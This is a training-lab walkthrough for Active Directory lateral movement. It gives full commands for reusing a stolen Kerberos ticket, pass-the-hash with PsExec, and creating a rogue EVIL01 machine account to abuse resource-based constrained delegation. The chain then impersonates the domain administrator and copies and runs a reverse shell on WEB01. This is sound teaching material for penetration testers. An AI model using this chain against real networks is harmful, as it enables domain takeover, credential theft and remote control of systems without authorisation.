# Lateral movement from DEV03 to WEB01

Once you have root access on DEV03, there is a Kerberos ticket for user Terence in /tmp (name is krb5cc_XXXXX). If you run BloodHound, you can see that Terence has RBCD on WEB01; however we first need to have a Windows session running in the context of Terence.  

Copy the ticket on your Kali, and convert it to Kirbi format (for later use with Rubeus PassTheTicket):   
`impacket-ticketConverter terence.ccache terence.kirbi`

Then, connect with PsExec on CLIENT03, copy the converted ticket, and import it in memory using Rubeus Pass-the-Ticket (don't use Evil-WinRM here):  
`proxychains impacket-psexec Administrator@172.16.X.Y -no-pass -hashes :<NTLM_ADMIN_CLIENT03>`  
`.\Rubeus.exe ptt /ticket:terence.kirbi # Import ticket into memory`

/!\ If you have ticket issue, please try reset before contacting me, it often happens on this lateral movement.

Then, we can perform the RBCD just like in the PDF lesson:
```ps
. .\PowerView.ps1
. .\Powermad.ps1
New-MachineAccount -MachineAccount EVIL01 -Password $(ConvertTo-SecureString 'Password1' -AsPlainText -Force) -Verbose
Get-DomainComputer EVIL01 # Get the Host SID
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<PUT HERE SID>)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer WEB01 | Set-DomainObject -Verbose -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
.\Rubeus.exe hash /password:Password1 # Generate Hash of the machine password
.\Rubeus.exe s4u /user:EVIL01$ /rc4:<HASH OF Password1> /msdsspn:CIFS/web01.cowmotors-int.com /impersonateuser:administrator /ptt
dir \\web01.cowmotors-int.com\C$

.\PsExec64.exe /accepteula \\web01.cowmotors-int.com whoami # Should show administrator and return code 0
cp revshell.exe \\web01.cowmotors-int.com\C$\revshell.exe
.\PsExec64.exe /accepteula \\web01.cowmotors-int.com C:\revshell.exe
```

Or (unless previous garantee 100% working, I don't ensure this technique works, but give it a try), after creating the New-MachineAccount:
`export KRB5CCNAME=terence.ccache`  
`proxychains impacket-rbcd -f EVIL01 -t WEB01 -dc-ip 172.16.DC.IP -k -no-pass cowmotors-int.com\\terence`
`proxychains impacket-getST -impersonate 'administrator' -dc-ip 172.16.DC.IP -spn CIFS/web01.cowmotors-int.com -ts cowmotors-int.com/EVIL01\$:'Password1' -k -no-pass `

TIP: some people reported me they had to reset the lab, maybe issue with the TGT in /tmp. If you have issue, please try this before. Beware of code snippets in the PDF, some hyphens disapeared.  

Then, you can either use Windows' PsExec or export the TGS to use with impacket.

Note : this document is subject to evolution to better fit your needs. We keep in touch ! If you have any question, feel free to contact me on Discord Tamarisk#3723